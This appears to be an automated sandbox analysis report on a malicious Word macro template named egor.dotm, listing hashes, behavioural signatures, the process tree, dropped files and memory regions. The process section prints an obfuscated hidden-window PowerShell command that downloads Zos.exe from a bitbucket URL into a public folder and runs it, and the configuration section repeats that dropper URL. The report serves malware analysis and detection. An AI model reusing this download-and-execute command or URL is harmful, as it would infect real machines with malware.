Analysis

  • max time kernel
    133s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 02:36

General

  • Target

    egor.dotm

  • Size

    14KB

  • MD5

    adccb9016b434427cd125ae841d1baaf

  • SHA1

    56aa1a0e7b1ba0d2714be1e36d4a59ca4ca8a05d

  • SHA256

    d6cdc6b64b477100f73ffa15b1fe7597e3a6c81431b527bc766f7bab27701e8b

  • SHA512

    9b4fbb5f16570c7a5165a53ffab8680db2122e3040ed411358f2a4fee2d8a24d525ab430651b0c1d1f93f8b7471b8ba9f7b58a96b167e5245a082a0d51c35c62

  • SSDEEP

    384:tmtl44XewvWv7lC78WQ6Su6akwLWdxdFYB3w:ql44XHvWTu8mSzakw6LqG

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://bitbucket.org/damnman/damn/downloads/Zos.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/Zos.e`xe -Dest C:\Users\Public\Zos.e`xe;C:\Users\Public\Zos.e`xe
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4440

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD3146.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wxtsu0t.wm5.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

    Filesize

    2KB

    MD5

    c59357e50e9bb8768be6c8e793ee6774

    SHA1

    a5a98a042eac13aa504035bc6e0c2787f29acfef

    SHA256

    c62265fbaf204f1cd8491ba62a29b839828e00c5a250ff3801276dcbf75fb93e

    SHA512

    0fad33925e276650fdfc3adefbe4bca684d5160806caa3fa7612064ba53578f3463bebe5d276186efc80bd2c8a0569e2d9aef85a2b39e437c24301aa6d76bd84

  • memory/1984-16-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

    Filesize

    64KB

  • memory/1984-8-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/1984-18-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-9-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-12-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-11-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-10-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-13-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

    Filesize

    64KB

  • memory/1984-7-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-14-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-15-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-6-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-5-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/1984-1-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/1984-3-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/1984-4-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-30-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-31-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-0-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp

    Filesize

    4KB

  • memory/1984-17-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-66-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-65-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-51-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp

    Filesize

    4KB

  • memory/1984-52-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-53-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-56-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/1984-2-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/4440-47-0x00000247EF760000-0x00000247EF774000-memory.dmp

    Filesize

    80KB

  • memory/4440-46-0x00000247EF280000-0x00000247EF2A6000-memory.dmp

    Filesize

    152KB

  • memory/4440-43-0x00000247EF2B0000-0x00000247EF2D2000-memory.dmp

    Filesize

    136KB